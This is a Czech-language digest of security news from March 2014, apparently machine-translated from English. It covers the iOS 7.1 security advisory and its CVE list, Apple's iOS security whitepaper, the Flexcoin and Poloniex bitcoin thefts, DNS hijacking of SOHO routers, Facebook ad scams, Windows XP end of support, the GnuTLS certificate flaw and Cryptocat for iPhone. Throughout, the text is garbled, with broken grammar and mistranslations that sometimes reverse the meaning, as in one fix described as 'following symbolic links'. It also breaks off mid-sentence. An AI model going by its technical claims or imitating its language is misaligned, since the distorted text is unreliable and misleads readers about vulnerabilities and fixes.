Zvyšující se frekvence, sofistikovanost a obchodní dopad kybernetických útoků tlačil plánování a ochranu před operačním obavy z IT oddělení kybernetické na klíčové téma na strategické agendy desek a generálních ředitelů.
Senior úrovně podnikání se stále potýkají informační mezeru, která dělá to pro ně obtížné sladit investice do ochrany rizik na skutečné strategické hodnoty digitálních aktiv organizace; to, podle zprávy globální obchodní poradenské společnosti Bain & Company. Statistiky ukazují, , že:
Střední cena cybercrimes vyskočil o 56 procent na 5.900.000 dolar za organizaci v roce 2011 oproti roku 2010, nejnovější údaje nejsou k dispozici
Web-based útoky ve stejném období zvýšil na 4500 za den, což je 36 procentní růst
Mobilní malware čtyřnásobně v roce 2013, s Android útoků se zvýšil o neuvěřitelných 26 krát
DDoS útoky vzrostly o 27 procent ve stejném období
Finanční motivy nyní řídit téměř 95 procent počítačových útoků, umístěním cíl přímo na strategických aktiv, které mohou být obohaceny po porušení.
Každá organizace, která utrpěla nedávno narušení bezpečnosti, zpráva konstatuje, také už nějakou formu kybernetické bezpečnosti na místě. Za to, že příliš mnoho organizací nedaří sladit bezpečnostních funkcí s většími cílů a celkového rizikového apetitu IT. Zpráva poukazuje na odpojení mezi úsilím řízení rizik v organizaci a rozvoj potřebných schopností kybernetické bezpečnosti jako skryté příčiny za materiální příčiny jednotlivých incidentů , protože obchodní skupiny a IT se často nedaří diskutovat o vznikajících hrozeb nebo relativní důležitost různých druhů digitálních aktiv. Místo toho, podle zprávy Bain, povinnosti dodržování, nikoliv strategie dopady, jsou největší hnací silou pro kybernetické úvahy pro tři-v- čtyři CIO. Zjištění demonstruje přes-spoléhání na operační přístupy k bezpečnosti.
Apple iOS 7.1
10.3.2014 Mobil | Zranitelnosti
Zde je detailní informace o dnešní Apple verzí - jak iOS a Apple TV byla aktualizována
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 je nyní k dispozici a řeší následující:
Zálohování
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: upraveného zálohování můžete změnit souborový systém
Popis: symbolický odkaz v záloze by být obnovena, což umožňuje
následné operace při obnovení zapisovat do zbytku
souborového systému. Tento problém byl vyřešen kontrolou pro symbolické odkazy
během procesu obnovení.
CVE-ID
CVE-2013-5133: evad3rs
Certifikát Důvěra politika
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: kořenové certifikáty byly aktualizované
Popis: Několik certifikáty byly přidány nebo odstraněny ze
seznamu systémových kořenů.
Profily konfigurace
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Profil vypršení termíny nebyly dodrženy
Popis: vypršení platnosti dat mobilních konfiguračních profilů byly
správně vyhodnoceny. Tento problém byl vyřešen díky lepší
manipulaci konfiguračních profilů.
CVE-ID
CVE-2014-1267
CoreCapture
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace může způsobit neočekávané systém
ukončení
Popis: dostupné problém tvrzení existoval v CoreCapture v
manipulaci s IOKit volání API. Tato otázka byla řešena prostřednictvím
dodatečného ověření vstupu z IOKit.
CVE-ID
CVE-2014-1271: Filippo Bigarella
Crash Reporting
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen změnit oprávnění na libovolné
soubory
Popis: CrashHouseKeeping následuje symbolické odkazy při
změně oprávnění k souborům. Tento problém byl vyřešen tím, že
následující symbolické odkazy při změně oprávnění k souborům.
CVE-ID
CVE-2014-1272: evad3rs
dyld
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Požadavky podepisování kódu lze obejít
Popis: Text stěhování pokyny v dynamických knihovnách může
být načten dyld bez záruky kód podpisu. Tato záležitost byla
řešena tím, že ignoruje pokyny textu přesídlení.
CVE-ID
CVE-2014-1273: evad3rs
FaceTime
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
přistupovat FaceTime kontakty ze zámku obrazovky
Popis: FaceTime kontakty na zamčené Přístroj může být vystaven působení
tím, že se nepodařilo FaceTime hovor z obrazovky uzamčení. Tento problém byl
vyřešen lepší manipulaci s FaceTime hovory.
CVE-ID
CVE-2014-1274
ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného PDF souboru může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení z JPEG2000
obrázků v PDF souborech. Tento problém byl vyřešen lepší hranic
kontroly.
CVE-ID
CVE-2014-1275: Felix Groebert týmu Google Security
ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru TIFF může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení Libtiff v z TIFF
obrázků. Tento problém byl vyřešen prostřednictvím dodatečného ověření
TIFF.
CVE-ID
CVE-2012-2088
ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru JPEG, může vést k
prozrazení obsahu paměťové
Popis: Neinicializovaný vydání access memory existoval v
zacházení Libjpeg ze markery JPEG, což vede k prozrazení
obsahu paměti. Tento problém byl vyřešen prostřednictvím dodatečného
ověření souborů JPEG.
CVE-ID
CVE-2013-6629: Michal Zalewski
IOKit HID akce
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace mohou sledovat na akce uživatele v jiných
apps
Popis: Rozhraní v rámcových IOKit povolených škodlivých aplikací
pro sledování na uživatelské akce v jiných aplikacích. Tento problém byl vyřešen
díky zlepšené politiky řízení přístupu v rámci.
CVE-ID
CVE-2014-1276: Min Zheng Hui Xue, a Dr. Tao (Lenx) Wei z FireEye
iTunes Store
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Útočník man-in-the-middle může lákat uživatele na
stahování škodlivého aplikace pomocí Enterprise App ke stažení
Popis: Útočník s výsadní postavení sítě by
spoof síťové komunikace lákat uživatele na stahování
škodlivého aplikace. Tento problém byl zmírněn pomocí SSL a pobízet
uživatele během URL přesměrování.
CVE-ID
CVE-2014-1277: Stefan Esser
Jádro
K dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen způsobit neočekávané systémové
ukončení nebo spuštění libovolného kódu v jádře
Description: out of bounds paměti Přístup problém existoval v ARM
funkce ptmx_get_ioctl. Tento problém byl vyřešen lepší
kontrolou hranic.
CVE-ID
CVE-2014-1278: evad3rs
Prohlížeč
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Otevření upraveného dokumentu aplikace Microsoft Word může
vést k neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
spuštění
Popis: dvojitý bez vydání existoval v manipulaci s
dokumenty Microsoft Word. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1252: Felix Groebert z týmu Google Security
Fotografie backend
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Jakmile snímky vymažete, může stále vypadat na fotkách aplikaci pod
průhledné obrázky
Popis: Odstranění obrázku z knihovny aktiv ani odstranit
mezipaměti verze obrazu. Tento problém byl vyřešen díky
lepší správě paměti cache.
CVE-ID
CVE-2014-1281: Walter Hoelblinger z Hoelblinger.com, Morgan Adams,
Tom Pennington
Profily
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Konfigurační profil může být skryté od uživatele
Popis: konfiguračního profilu s dlouhým názvem by mohl být
zaveden do zařízení, ale byl nezobrazuje se v uživatelském rozhraní profilu.
Problém byl vyřešen lepší prací s názvy profilu.
CVE-ID
CVE-2014-1282: Assaf Hefetz, Yair Amit a Adi Sharabani z Skycure
Safari
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Pověření uživatele mohou být zveřejněny na nečekané stránky pomocí
funkce Automatické vyplňování
Popis: Safari může autofilled uživatelská jména a hesla
do pomocného rámu od jiné doméně, než na hlavním rámu. Tento
problém byl vyřešen lepší sledování původu.
CVE-ID
CVE-2013-5227: Niklas Malmgren z Klarna AB
Nastavení - Účty
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
zakázat Find My iPhone, aniž byste zadali iCloud hesla
Popis: Problém státní správy existoval v zacházení s
Find My iPhone stavu. Tento problém byl vyřešen lepší
manipulaci Find My iPhone stavu.
CVE-ID
CVE-2014-1284
Springboard
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
vidět na domovskou obrazovku zařízení, i když je přístroj nebyl
aktivován
Popis: neočekávané ukončení aplikace při aktivaci
může způsobit, že telefon bude ukázat na domovskou obrazovku. Tento problém byl
vyřešen lepší zpracování chyb při aktivaci.
CVE-ID
CVE-2014-1285: Roboboi99
Springboard Screen Lock
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Vzdálený útočník může způsobit zámek displeje, aby
se stal odpovídat
Popis: otázka státní správa existoval v zámku obrazovce.
Tento problém byl vyřešen lepší správou státu.
CVE-ID
CVE-2014-1286: Bogdan Alecu M-sec.net
TelephonyUI Framework
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: webová stránka by mohla vyvolat zvukový volání FaceTime bez uživatelské
interakce
Popis: Safari nekonzultoval uživatele před zahájením
FaceTime-audio: / / URL. Tento problém byl vyřešen přidáním
řádku s potvrzením.
CVE-ID
CVE-2013-6835: Guillaume Rosse
USB Host
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
způsobit spuštění libovolného kódu v režimu jádra
Popis: problém poškození paměti existoval v zacházení
zpráv USB. Tento problém byl vyřešen prostřednictvím dodatečného ověření
zpráv USB.
CVE-ID
CVE-2014-1287: Andy Davis NCC Group
Video Driver
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Přehrávání upraveného videa by mohlo vést k zařízení
stále nereaguje
Popis: null problém dereference existoval v zacházení s
MPEG- 4. kódované soubory. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1280: rg0rd
WebKit
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Navštívení upravené www stránky může vést k
pádu aplikace nebo spuštění nežádoucího kódu
Popis: Několik problémy s poškozením paměti existovala v WebKit.
Tyto otázky byly řešeny prostřednictvím lepší správou paměti.
CVE-ID
CVE-2013-2909: Atte Kettunen z OUSPG
CVE-2013-2926: cloudfuzzer
CVE-2013-2928: Google Chrome bezpečnostní tým
CVE-2013-5196: Google Chrome bezpečnostní tým
CVE -2013-5197: Google Chrome bezpečnostní tým
CVE-2013-5198: Apple
CVE-2013-5199: Apple
CVE-2013-5225: Google Chrome bezpečnostní tým
CVE-2013-5228: Keen Team (@ K33nTeam) spolupracuje s organizací Zero Day HP
Iniciativa
CVE-2013-6625: cloudfuzzer
CVE-2013-6635: cloudfuzzer
CVE-2014-1269: Apple
CVE-2014-1270: Apple
CVE-2014-1289: Apple
CVE-2014-1290: ant4g0nist (segfault) spolupracuje s HP Zero Day
Initiative, Google Chrome bezpečnostní tým
CVE-2014-1291: Google Chrome bezpečnostní tým
CVE-2014-1292: Google Chrome bezpečnostní tým
CVE-2014-1293: Google Chrome bezpečnostní tým
CVE-2014-1294: Google Chrome bezpečnostní tým
Informace budou také zveřejněny na Apple Security aktualizace
webu: http://support.apple.com/kb/HT1222
Apple aktualizoval whitepaper systému iOS
10.3.2014 Mobil
Aktualizace dokumentu k iOS odhaluje detailní informace o propracované bezpečnostní architektuře systémů zařízení iPhone a iPad.
33stránkový whitepaper nazvaný iOS Security byl vydán v únoru 2014 a je nyní k dispozici online (ve formátu PDF). Předchozí verze je datována do listopadu 2012, přibližně do doby, kdy firma Apple začala bezpečnosti věnovat zvýšenou pozornost. Nový dokument detailně popisuje nové bezpečnostní funkce, které byly uvedeny do systémů iOS, především verze 7: Snímač otisků prstů Touch ID, integrace jednotného přihlášení do korporátních aplikací a služeb, zabezpečení spojení konektivity Airdrop (ať už Wi-Fi nebo Bluetooth), iCloud Keychain pro generování a správu silných hesel a v neposlední řadě Secure Enclave, bezpečnostní koprocesor integrovaný do 64bitového procesoru Apple A7.
Whitepaper je podle bezpečnostních konzultantů zásadní změnou v přístupu Applu a jak říká Rich Mogull: „Obsahuje více informací o bezpečnosti iOS, než kdy Apple oficiálně uvolnil. Studiem tohoto dokumentu strávíme měsíce.“ Z tohoto pohledu se Apple donedávna choval jako Microsoft před deseti lety, kdy bylo zvykem uveřejňovat co nejméně informací o bezpečnostních standardech.
Detaily bezpečnostní architektury Apple, včetně její certifikace podle normy FIPS 140-2, nepochybně dále pomohou otevírat dveře do vládních agentur nebo korporací s extrémními bezpečnostními požadavky. „Řada profesionálů dosud nepovažovala produkty Apple za dostatečně zralé pro korporátní či státní bezpečnost, ale Apple se možná pomalu stává standardem v mobilní bezpečnosti. Již nyní jsou možná zařízení Apple zabezpečenější než jakékoli jiné běžně dostupné zařízení.“
To ale neznamená, že neexistuje spousta prostoru pro zlepšení, jak to ukázala poslední bezpečnostní konference RSA, kde bylo předvedeno několik způsobů, jak se mohou aplikace běžící na pozadí nerootovaného iPhonu dostat například ke všem dotekům na obrazovce a fungovat tedy jako typický keylogger. To představuje chybu spíše systémové architektury než autorů jednotlivých aplikací, i když na ty vina za bezpečnostní nedostatky nejčastěji padá. Na analýzu bezpečnostních slabin aplikací dostupných pro iOS se zaměřil výzkum firmy HP publikovaný v listopadu 2013. Testováno bylo více než 2000 mobilních aplikací používaných 600 velkými korporacemi v 50 zemích světa a jak se ukázalo, 90 procent z nich vykazovalo nějakou bezpečnostní slabinu či chování, od nepoužívání šifrování po data ukládaná v zařízení nebo dokonce přenášená po internetu.
Více Bitcoin krádeže, Bitcoin banka Flexcoin vypne
10.3.2014 Kriminalita
Pouhé dny po Mt. GOX podali návrh na konkurz , "Bitcoin banky" Flexcoin a Bitcoin výměnu Poloniex oznámily, že byly úspěšně terčem zlodějů. Zatímco Poloniex bude i nadále podnikat, správci Flexcoin se rozhodli ho vypnout.
"On 02.03.2014 Flexcoin byl napaden a okraden o všechny mince v horkém peněžence útočník utekl s 896 BTC, a rozdělit je do těchto dvou adresách:. 1NDkevapt4SWYFEmquCDBSf7DLMTNVggdu a 1QFcC5JitGwpFKqRDd9QNH3eGN56dCNgy6," oni oznámil dnes na hlavní stránce burzy. "Jako Flexcoin nemá prostředky, majetek nebo jinak, aby se vrátil z této ztráty, jsme zavírat dveře okamžitě." Dobrou zprávou pro uživatele, kteří využili možnost Flexicoin ze dne dát své mince do chladírenského skladu je, že jejich skrýš zůstal nedotčen, a může být zrušeno, jakmile se jejich identita ověřena. "Všichni ostatní uživatelé budou přesměrováni na Flexcoin je" Podmínky služby "," se nachází v "Flexcoin.com/118.html" dokument, který byl dohodnut na základě podpisu s Flexcoin, "pokračovali, a dodal, že se" pokusí spolupracovat s policií dohledat zdroj hack. " Také dnes, Poloniex 'majitel zveřejněny na BitcoinTalk, že hacker využil kódu zranitelnosti vůči . ukrást to, co činí 12,3 procenta všech Bitcoins na Poloniex Po vysvětlení, jak hacker provedl loupež, řekl, že nese plnou odpovědnost za to, co se stalo, a bude splácet dluh Jeho plán pro to je následující.:
Směnné fondy 12,3% krátké. Vzhledem k tomu, že není dostatek BTC na pokrytí bilance každého z nás, všechny zůstatky budou dočasně odečte 12,3%. Pochopte prosím, že toto je absolutní nutností - kdybych nedělal toto nastavení, lidé by se s největší pravděpodobností stáhne všechny své BTC co nejdříve, aby se ujistil, že nebyly ponechány v oněch zbývajících 12,3%. Kromě zřejmého vrácení většiny BTC je vyřazen z výměny, by to nebylo fér - někteří lidé by si všechny své peníze hned, a pár by se nic hned. Částka odečtena z bilancí každého z nás budou zaznamenány, a finanční prostředky získané z burzovních poplatků, stejně jako dary z mé vlastní kapsy (což není příliš hluboká, obávám se), bude pravidelně distribuovány všem uživatelům, kteří měli BTC odečteny. Výměna poplatky se zvýší urychlit vymáhání dluhu.
On také vyzval uživatele, aby místo výběry v okamžiku, protože nebudou zpracovávány v tomto okamžiku, a sdílí kroky se bude dělat, aby se stejný útok nelze napodobit.
300000 směrovače ohrožena v DNS únos kampaně
10.3.2014 Incidenty | Počítačový útok
Některé 300.000 potvrdila - ale s největší pravděpodobností mnohem více - se malá kancelář / domácí kanceláře (SOHO) routery byly ohroženy a jejich nastavení DNS změnil používat dvě IP adresy v Londýně, účinně umožňuje dosud neznámé útočníci provádět Man-in-the-middle útoky . "K dnešnímu dni jsme identifikovali více než 300.000 přístrojů, převážně v Evropě a Asii, které věříme, že byly zneužity v rámci této kampaně, ten, který sahá až do nejméně poloviny prosince roku 2013," hlásil výzkumníky Team Cymru, kteří zahlédl několik postižené TP-Link Wi-Fi routery v lednu začala vyšetřovat záležitost.
"Směrovače oba malé kanceláře / domácí kanceláře (SOHO), třídy zařízení, která uvedené Wi-Fi připojení, místní DNS, DHCP a služby zákazníkům, a nebyly s použitím výchozích hesel," poukázali. , ale některé z nich byly spuštěny verze firmware zranitelné Cross-Site Request padělání útoky, a alespoň jeden běhu firmware sportovní nedávno objevil . chybu, která umožňuje útočníkům ke stažení konfiguračního souboru přístroje, které, samozřejmě, obsahuje pověření pro správu Dotčené routery pocházejí od různých výrobců - výše uvedené TP-Link, D-Link, Micronet, a jiní - a oni jsou převážně nacházejí ve Vietnamu, Indii, Itálii, Thajsku, a Kolumbie, ale také v Srbsku, Ukrajině a Bosně a Hercegovině. Zajímavostí této kampaně je, že Zdá se, že v současné době jsou DNS dotazy zaslané těchto dvou IP adresy jsou předávány na legitimní servery. "Pokusy o přihlášení do místních bankovních webových stránek v postižených zemích, a stáhnout aktualizace softwaru od společnosti Adobe a další vše se zdá fungovat normálně, i když mnoho požadavků vyřešit nápadně pomalu nebo se nepodařilo dokončit. Webové stránky jsme testovali také se objevil na normálního zobrazení reklamy pomocí těchto DNS serverů, "výzkumníci zjistili. Takže buď to hmotnost ohrožena je příprava pro pozdější neplechu, nebo škoda již byla provedena. Vědci Team Cymru si všimli jisté podobnosti mezi touto kampaní a ještě jedna, která byla většinou omezena na cílení zákazníků z několika polských bank, ale k závěru, že "jemné rozdíly v tradecraft zaměstnaných je pravděpodobné, že [se] dodržují buď samostatné kampaně do stejné skupiny, nebo více aktérů s využitím stejné techniky pro různé účely. " Oni také dodal, že nevěří, že také nedávno objevil Měsíc červ cílení kampaně Linksys routery se montuje stejným útočníky. Vědci oznámily orgány o této kampani, a také výrobci z dotčených zařízení. Team Cymru mluvčí Steve Santorelli sdílet s PC Pro , že dvě IP adresy, které jsou DNS dotazy jsou přesměrovány jsou umístěny na strojích v Nizozemsku, ale jsou registrovány UK-založená společnost 3NT řešení. IP rozsahy této společnosti již dříve a opakovaně byl spojován s spamování stránkách. Vědci mají společné užitečné techniky pro zmírnění tohoto typu útoku v whitepaper . "Jako bar je stále aktivována pro ohrožení koncových stanic, počítačoví zločinci se obracejí na nové metody pro dosažení jejich požadovaných cílů, bez přístupu k počítačům obětí přímo. Kampaň je uvedeno v této zprávě je poslední v rostoucím trendu Team Cymru je pozorován kybernetických zločinců zaměřených SOHO routery, "oni poznamenal. Není divu, že zločinci jsou jít po těchto zařízení, za předpokladu, že jsou notoricky plné využitelnosti bezpečnostních děr, a uživatelé jsou laxní, pokud jde o změnu hesla výchozí správce?
Podvodníci se obrátit na Facebooku cílení
10.3.2014 Sociální sítě
Podvodníci jsou stále častěji využívají Facebook zaměřených nástrojů a důvěru uživatelů, aby se zasadila levné léčiv, značkové repliky a další výrobky v trendu připomínajícího tradiční spamu, podle BitDefender.
Přes 24 milionů uživatelů Facebooku jsou aktivní každý den na sociální síti ve Velké Británii a 33 milionů unikátních jednotlivci přihlásit každý měsíc. Šestiměsíční studie ukazuje, že rychlý růst sociálních sítí a přesnost svých reklamních nástrojů jsou výzvou zločince, aby nalákali uživatele Facebook s lákavými nabídkami, které mohou, stejně jako tradiční spamu, konec v ukradených uživatelských dat. Výzkum na 50.000 unikátních domén bylo zjištěno, že lékárna výrobky tvoří 33 procent podezřelých Facebooku inzerátů. Repliky tvoří 30 procent, hazard pokrývá o 18 procent a datování účtů na 19 procent. "Facebook je velmi komplexní seznam možností cílení, které umožňuje podvodníci maximalizovat jejich úspěch," říká Catalin Cosoi, Chief Security stratég BitDefender. "Skutečnost, že inzeráty jsou obsaženy v důvěryhodném prostředí určitě láká na více uživatelů než vaše průměrná spamu." možnosti Ad-cílení na Facebooku rozsahu od výběru věkové skupiny a zeměpisné oblasti, pro lidi se společnými zájmy. Na rozdíl od e-mailu spam, to umožňuje velmi přesné zacílení potenciálních obětí podvodu. "Populární příklady jsou reklamy na vysoce hodnotných cen, jako je elektronika, automobily a velké sumy peněz," dodává Catalin Cosoi. "Kliknutí se uživatelům podvodných schémat, že přesvědčit je, aby pryč citlivé údaje, jako je osobní nebo kreditní karty detaily. Mohou být také napálil do instalací škodlivý kus software, lákal do SMS loterie podvod nebo vzít do obchodů, které prodávají padělané zboží.
Microsoft snaha, aby uživatelé klesnout Windows XP pokračuje
10.3.2014 Zranitelnosti | Bezpečnost
Jako datum plánovaného odchodu do důchodu z Windows XP - pravděpodobně jeden z nejoblíbenějších produktů Microsoftu někdy - se blíží, společnost pokračuje ve svém pátrání, aby se co nejvíce uživatelů je to možné přejít na novější verzi operačního systému, pokud možno do systému Windows 8.1.
Plán byl byl na několik let, ale většina uživatelů XP se nepodařilo, aby tento krok pro své vlastní důvody, a Microsoft se snaží jumpstart posun v mnoha ohledech. Nedávno se pokusil naverbovat tech-důvtipný uživatelé pomoci jejich méně znalí přátelé a rodina upgrade na novější verzi systému Windows, a pokud nemohou (počítač je příliš starý), koupit si nový počítač a nový OS. Bohužel pro Microsoft, většina uživatelů zažil tuto výzvu jako špatně maskovaný prodejní hřiště, a bránil dělat změny. Skutečnost, že společnost ani poskytnout dobré aktualizační nástroj byl další kámen úrazu. Ten problém byl vyřešen den předtím, než včera, kdy společnost oznámila, že se spojil s Laplink poskytnout uživatelům Windows XP s volnou migraci dat nástroj, který bude kopírovat své soubory a nastavení ze svého Windows XP počítače do nového zařízení se systémem některou z novějších verzích systému Windows. Také dodal, že systém Windows XP Home nebo Professional edition, které nedělají změny budou upozorněni na to jednou měsíc počínaje dnem 08.3.2014 přes pop-up upozornění, že budou nabízet odkaz na společnosti Windows XP Konec webových stránkách podpory:
Ale to není všechno. Pokud budou i nadále používat OS, a také používat Security Essentials - na které, mimochodem, Microsoft bude i nadále dodávat antimalware podpisy až 14 července 2015 - se mohou těšit na bytí "otravovali" prostřednictvím jiného kanálu. Jakmile Security Essentials je aktualizován na nejnovější verzi (4.5), budou uživatelé Windows XP i nadále vidět varování v programu, a to system tray, že jejich počítač je "potenciálně nechráněný." No, existuje ještě další měsíc jít, dokud nezastaví verze obtěžování OS je podporovány, a těším se na setkání, jaké další nápady Microsoft přijde s další.
Hlavní mezery nalezené v řízení vznikajících technologií
10.3.2014 Zranitelnosti
SailPoint zveřejnil infographic, který nastiňuje nejnovější výsledky výzkumu, které ukazují, že zatímco globální podniky vítají - a v některých případech pověřily - využívání cloudu a mobilních technologií, které nemají IT kontroly na místě, aby řádně spravovat. Bez správné preventivní a detektiv řídí, tyto podniky jsou v konečném důsledku uvedení se zvýšené riziko podvodu, krádeže a porušování soukromí. Klikněte na infographic pro kompletní, velké verze:
Nedávná SailPoint je Market Pulse Survey našli komplexní IT prostředí, kde jsou podniky stále dohání k požadované úrovně dohledu a kontroly potřebné ovládat nové technologie jako součást jejich celkové bezpečnosti a řízení rizik programu. Infographic nastiňuje klíčová zjištění z průzkumu, včetně:
63% podniků se vyžaduje rozhodnutí, tvůrci hodnotit cloudové aplikace jako součást každého procesu zadávání veřejných zakázek software. Již 39% mission-critical aplikace jsou v současné době uloženy v oblaku, čímž se zvýší na 59% do roku 2016.
82% respondentů, aby zaměstnanci mohli používat své osobní zařízení pro přístup k firemním datům a aplikace na práci. Nicméně, cloud a bring-vaše-vlastní-zařízení (BYOD) trendy jsou nápadně chybí bezpečnostní programy většiny firem. Ve skutečnosti, tolik jak 41% respondentů přiznala k neschopnosti řídit cloud a BYOD jako součást jejich identity a přístupu strategie řízení.
Prohlubuje problém, méně než polovina respondentů mají postup na místě, aby se automaticky odstranit mission-critical data z mobilních zařízení, zatímco 46% respondentů nejsou ani důvěru ve své schopnosti udělit nebo zrušit přístup zaměstnanců k aplikacím v rámci celého svého IT prostředí .
Vzhledem k nedostatku viditelnosti, 52% respondentů připouští, že zaměstnanci mají číst nebo vidět firemních dokumentů, které by neměly mít přístup k, a 51% věří, že je to "jen otázkou času", než dojde k porušení bezpečnosti.
GnuTLS knihovna chyba otevírá cestu pro MITM útoky
10.3.2014 Zranitelnosti | Počítačový útok
Kritická kryptografický chyba podobná té, nedávno objevené v iOS a OS X byla odhalena existovat v knihovně kódů GnuTLS, široce používán v open source software a linuxových distribucí. "GnuTLS knihovna poskytuje podporu pro kryptografických algoritmů a protokolů jako Transport Layer Security (TLS). Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření, "bezpečnostní tým Red Hat je vysvětleno v bezpečí poradenství oznámil vydání aktualizace, která řeší problém. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem (CVE-2014-0092) místě." chyba byla objevena Nikos Mavrogiannopoulos z Red Hat Security Technologies Tým, v průběhu auditu GnuTLS pro Red Hat. Další chyba byla nalezena v cestě GnuTLS ovládal verze 1 X.509 certifikáty, které by mohly umožnit útočníkovi podařilo získat takový certifikát od důvěryhodné certifikační autority pro vydávání certifikátů pro jiné weby, které by být přijata GnuTLS jako platné (CVE-2009-5138). mají chyby byly opraveny a uživatelé GnuTLS se doporučuje přejít na aktualizovaných balíčků a restartovat všechny aplikace spojené s knihovnou GnuTLS, aby se změna projeví. Ostatní Projekty se přestěhovali opravit chybu v této knihovně, včetně Debian a Ubuntu , ale stovky dalších aplikací a operačních systémů používají to jsou ještě k tomu. vývojáři GnuTLS také poskytuje novou verzi knihovny, která řeší problém, a jak Alternativou k tomu, náplast, která dočasně zmírňuje ji. chyba je dost vážné, protože to by mohlo umožnit útočníkovi vydávat se za jinou webovou stránku a zachytit a dekódovat všechny šifrované provoz, který jde od koncového uživatele k serveru a zpět. příčinou chyba je, jako ve výše uvedeném případě Apple, zdánlivě jednoduchá a velmi snadno přehlédnout v zběžné kontroly - pár "goto vyčištění" volá na špatném místě, a škoda byla dělána. A zřejmě to bylo děláno lety - v roce 2005, nebo ještě dříve. Toto zjevení a podobnost mezi dvěma crypto nedostatky již způsobit, že některé on-line komentátoři spekulovat, že obě byly vloženy úmyslně zpravodajské komunity USA. To je, samozřejmě, jen teorie. Co je určitě známo, že knihovna GnuTLS je tak široce používané, že to bude trvat nějaký čas pro každý projekt použitím provést nezbytná bezpečnostní opravy.
Cryptocat nyní k dispozici pro iPhone
10.3.2014 Mobil
Cryptocat, populární open source aplikace, která umožňuje uživatelům chatovat on-line snadno a bezpečně, je nyní k dispozici pro uživatele iPhone (na Apple App Store), stejně. Cryptocat nejprve vzal podobu webové aplikace pro Mac OS X a rozšíření prohlížeče, která pro Chrome, Firefox, Safari, Opera a, ale v prosinci loňského roku tým za ním zveřejněna zdrojový kód pro Cryptocat pro iPhone a Android, a vyzvala bezpečnostní komunity, aby si jej a pomoci najít bezpečnostní chyby.
"Naším cílem bylo vždy na to, aby šifrované chatu zábavné a snadné použití, v první řadě," komentoval Cryptocat tvůrce Nadim Kobeissi v blogu oznámil Cryptocat pro iPhone. iPhone verze je nativní aplikace - používá rozhraní API systému iOS 'místo web kryptografie. "Cryptocat pro iPhone používá OTR protokol pro soukromé hovory, a naše pevně zrání pluralitní protokol pro skupinové konverzace. S naší současnou výzkumu mpOTR, doufáme, že se brzy nabídne vylepšenou globální standard, který přináší šifrovací systém Cryptocat je na jiné platformy jako dobře, "dodal Kobeissi. aplikace funguje bez problémů s klienty Cryptocat počítačových, takže to není nutné, aby všechny strany v rozhovoru použít aplikaci pro iPhone. Fungování a vzhled zůstal stejný. Kobeissi poznamenat, že vítají zpětnou vazbu od uživatelů a vyjmenoval některé budoucí vylepšení, které pracují na. verze aplikace již byla kritizována dobře známý iPhone forenzní expert Jonathan Zdziarski, kteří tvrdí, že Cryptocat je nabízen uživatele Historie pomíjivost chybí app. "Byl jsem opravdu nadšený, že vidět to app hit App Store, ale bohužel nezobrazí verze iOS, že byly psány s Ochrana osobních údajů / ohledem na bezpečnost," řekl varoval v přezkumu aplikace . "app zanechává poklad forenzních artefaktů, které mohou být zrušena z vašeho přístroje, pokud je to vůbec ukradeno, pirát, nebo zabavených orgány činnými v trestním řízení. Nejpozoruhodnější z nich je, že všechny vaše minulé psaní je přihlášen do Apple klávesnice vyrovnávací paměti , takže předchozí konverzace, včetně slovo se počítá, lze získat z přístroje. Cryptocat mohla bránit tím, že vypnete automatické opravy nebo psát jejich vlastní. " "Aplikace také 